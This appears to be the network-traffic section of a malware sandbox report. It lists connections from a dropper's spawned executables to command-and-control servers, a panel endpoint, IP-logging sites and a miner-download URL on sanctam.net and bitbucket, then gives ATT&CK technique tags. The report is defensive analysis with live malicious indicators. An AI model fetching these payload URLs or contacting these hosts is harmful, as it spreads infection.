152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
93.189.42.181:80

http

3589249.exe

19.8kB
5.7kB
29
30
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
88.99.66.31:443

https://iplogger.org/1c2My7

tls, http

PublicDwlBrowser1100.exe

723 B
6.2kB
8
8

HTTP Request

GET https://iplogger.org/1c2My7

HTTP Response

200
88.99.66.31:443

https://iplogger.org/1c5My7

tls, http

PublicDwlBrowser1100.exe

516 B
1.2kB
5
4

HTTP Request

GET https://iplogger.org/1c5My7

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.157.102:40915

8209024.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

144 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

175 B
88 B
3
2
204.79.197.200:443

ieonline.microsoft.com

tls

iexplore.exe

707 B
7.7kB
8
12
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
104.26.12.31:443

https://api.ip.sb/geoip

tls, http

4463916.exe

756 B
6.3kB
9
10

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.157.102:40915

1278526.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
185.215.113.202:80

http://185.215.113.202/PmVc3sOf/index.php

http

rnyuf.exe

841 B
602 B
13
5

HTTP Request

POST http://185.215.113.202/PmVc3sOf/index.php

HTTP Response

200
185.215.113.202:80

http://185.215.113.202/PmVc3sOf/index.php?scr=1

http

rnyuf.exe

67.0kB
1.4kB
63
25

HTTP Request

POST http://185.215.113.202/PmVc3sOf/index.php?scr=1

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
162.0.210.44:443

https://connectini.net/Series/Conumer2kenpachi.php

tls, http

Dyjicyrizhe.exe

992 B
3.0kB
10
8

HTTP Request

POST https://connectini.net/Series/Conumer2kenpachi.php

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.157.102:40915

8209024.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
93.184.220.29:80

http://crl3.digicert.com/Omniroot2025.crl

http

iexplore.exe

812 B
17.0kB
12
16

HTTP Request

GET http://crl3.digicert.com/Omniroot2025.crl

HTTP Response

200

HTTP Request

GET http://crl3.digicert.com/Omniroot2025.crl

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.157.102:40915

1278526.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
104.21.10.67:443

https://phonefix.bar/

tls, http

4218290.exe

41.9kB
2.2MB
778
1543

HTTP Request

GET https://phonefix.bar/api.php?getusers

HTTP Response

200

HTTP Request

GET https://phonefix.bar/api.php

HTTP Response

200

HTTP Request

POST https://phonefix.bar/

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
104.26.12.31:443

https://api.ip.sb/geoip

tls, http

3589249.exe

762 B
6.4kB
9
11

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
185.65.135.234:58899

https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig

tls, http

services64.exe

1.2kB
7.0kB
12
15

HTTP Request

GET https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.157.102:40915

8209024.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
104.192.141.1:443

https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig

tls, http

services64.exe

33.7kB
2.1MB
722
1437

HTTP Request

GET https://bitbucket.org/Sanctam/sanctam/raw/d2123dc19ea65d0fdce7b5d17328d978c42b18cc/includes/xmrig

HTTP Response

200
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.157.102:40915

1278526.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
132 B
3
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.157.102:40915

8209024.exe

630 B
44 B
9
1
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

152 B
3
95.181.172.207:56915

Tue11e4e580f2e8141a3.exe

179 B
92 B
3
2

8.8.8.8:53

a.goatgame.co

dns

Tue11d7385a978cc.exe

59 B
91 B
1
1

DNS Request

a.goatgame.co

DNS Response

172.67.146.70

104.21.79.144
8.8.8.8:53

hsiens.xyz

dns

setup_install.exe

56 B
88 B
1
1

DNS Request

hsiens.xyz

DNS Response

104.21.87.76

172.67.142.91
8.8.8.8:53

cleaner-partners.biz

dns

setup.exe

66 B
98 B
1
1

DNS Request

cleaner-partners.biz

DNS Response

46.8.29.181

95.181.163.181
8.8.8.8:53

safialinks.com

dns

46807GHF____.exe

60 B
76 B
1
1

DNS Request

safialinks.com

DNS Response

162.0.213.132
8.8.8.8:53

remotenetwork.xyz

dns

PublicDwlBrowser1100.exe

63 B
128 B
1
1

DNS Request

remotenetwork.xyz
8.8.8.8:53

gheorghip.tumblr.com

dns

Alfanewfile2.exe

66 B
98 B
1
1

DNS Request

gheorghip.tumblr.com

DNS Response

74.114.154.22

74.114.154.18
8.8.8.8:53

startupmart.bar

dns

PublicDwlBrowser1100.exe

61 B
93 B
1
1

DNS Request

startupmart.bar

DNS Response

104.21.37.182

172.67.211.161
8.8.8.8:53

cdn.discordapp.com

dns

Tue11f251db82fb7b.exe

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.133.233

162.159.130.233

162.159.134.233

162.159.129.233

162.159.135.233
8.8.8.8:53

2no.co

dns

52 B
68 B
1
1

DNS Request

2no.co

DNS Response

88.99.66.31
8.8.8.8:53

wheelllc.bar

dns

5382906.exe

58 B
90 B
1
1

DNS Request

wheelllc.bar

DNS Response

104.21.64.202

172.67.136.53
8.8.8.8:53

api.ip.sb

dns

3589249.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

172.67.75.172

104.26.13.31
8.8.8.8:53

phonefix.bar

dns

4218290.exe

58 B
90 B
1
1

DNS Request

phonefix.bar

DNS Response

172.67.131.66

104.21.10.67
8.8.8.8:53

connectini.net

dns

Dyjicyrizhe.exe

60 B
76 B
1
1

DNS Request

connectini.net

DNS Response

162.0.210.44
8.8.8.8:53

crl.usertrust.com

dns

Tue112c483dd3245d.exe

63 B
79 B
1
1

DNS Request

crl.usertrust.com

DNS Response

151.139.128.14
8.8.8.8:53

safialinks.com

dns

46807GHF____.exe

60 B
76 B
1
1

DNS Request

safialinks.com

DNS Response

162.0.213.132
8.8.8.8:53

requestimmersive.com

dns

46807GHF____.exe

66 B
82 B
1
1

DNS Request

requestimmersive.com

DNS Response

162.0.220.187
8.8.8.8:53

connectini.net

dns

Dyjicyrizhe.exe

60 B
76 B
1
1

DNS Request

connectini.net

DNS Response

162.0.210.44
8.8.8.8:53

www.profitabletrustednetwork.com

dns

IEXPLORE.EXE

78 B
126 B
1
1

DNS Request

www.profitabletrustednetwork.com

DNS Response

192.243.59.13

192.243.59.12

192.243.59.20
8.8.8.8:53

live.goatgame.live

dns

3002.exe

64 B
96 B
1
1

DNS Request

live.goatgame.live

DNS Response

172.67.222.125

104.21.70.98
8.8.8.8:53

cleaner-partners.biz

dns

setup.exe

66 B
98 B
1
1

DNS Request

cleaner-partners.biz

DNS Response

95.181.163.181

46.8.29.181
8.8.8.8:53

ip-api.com

dns

jhuuee.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

qwertys.info

dns

2.exe

58 B
90 B
1
1

DNS Request

qwertys.info

DNS Response

104.21.20.198

172.67.194.30
8.8.8.8:53

liveme31.com

dns

setup_2.tmp

58 B
90 B
1
1

DNS Request

liveme31.com

DNS Response

104.21.13.27

172.67.132.120
8.8.8.8:53

gavenetwork.bar

dns

PublicDwlBrowser1100.exe

61 B
126 B
1
1

DNS Request

gavenetwork.bar
8.8.8.8:53

gheorghip.tumblr.com

dns

Alfanewfile2.exe

66 B
98 B
1
1

DNS Request

gheorghip.tumblr.com

DNS Response

74.114.154.22

74.114.154.18
8.8.8.8:53

remotenetwork.xyz

dns

PublicDwlBrowser1100.exe

63 B
128 B
1
1

DNS Request

remotenetwork.xyz
8.8.8.8:53

iplogger.org

dns

PublicDwlBrowser1100.exe

58 B
74 B
1
1

DNS Request

iplogger.org

DNS Response

88.99.66.31
8.8.8.8:53

retse.info

dns

2.exe

56 B
88 B
1
1

DNS Request

retse.info

DNS Response

172.67.211.113

104.21.77.200
8.8.8.8:53

startupmart.bar

dns

PublicDwlBrowser1100.exe

61 B
93 B
1
1

DNS Request

startupmart.bar

DNS Response

104.21.37.182

172.67.211.161
8.8.8.8:53

downloadlog.com

dns

postback.exe

61 B
77 B
1
1

DNS Request

downloadlog.com

DNS Response

188.119.65.241
8.8.8.8:53

starlightwin.info

dns

IEXPLORE.EXE

63 B
79 B
1
1

DNS Request

starlightwin.info

DNS Response

138.197.221.170
8.8.8.8:53

nopedope1.com

dns

explorer.exe

59 B
91 B
1
1

DNS Request

nopedope1.com

DNS Response

104.21.6.118

172.67.134.210
8.8.8.8:53

ihotdates.com

dns

IEXPLORE.EXE

59 B
75 B
1
1

DNS Request

ihotdates.com

DNS Response

138.68.233.239
8.8.8.8:53

maf-pub.com

dns

explorer.exe

57 B
89 B
1
1

DNS Request

maf-pub.com

DNS Response

104.21.91.222

172.67.180.210
8.8.8.8:53

real-web-online.bar

dns

5264274.exe

65 B
97 B
1
1

DNS Request

real-web-online.bar

DNS Response

172.67.159.99

104.21.74.148
8.8.8.8:53

primods.com

dns

explorer.exe

57 B
73 B
1
1

DNS Request

primods.com

DNS Response

188.119.65.241
8.8.8.8:53

google.com

dns

Dyjicyrizhe.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.251.36.46
8.8.8.8:53

api.ip.sb

dns

3589249.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

crl3.digicert.com

dns

iexplore.exe

63 B
111 B
1
1

DNS Request

crl3.digicert.com

DNS Response

93.184.220.29
8.8.8.8:53

phonefix.bar

dns

4218290.exe

58 B
90 B
1
1

DNS Request

phonefix.bar

DNS Response

104.21.10.67

172.67.131.66
8.8.8.8:53

sanctam.net

dns

services64.exe

57 B
73 B
1
1

DNS Request

sanctam.net

DNS Response

185.65.135.234
8.8.8.8:53

bitbucket.org

dns

services64.exe

59 B
75 B
1
1

DNS Request

bitbucket.org

DNS Response

104.192.141.1

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery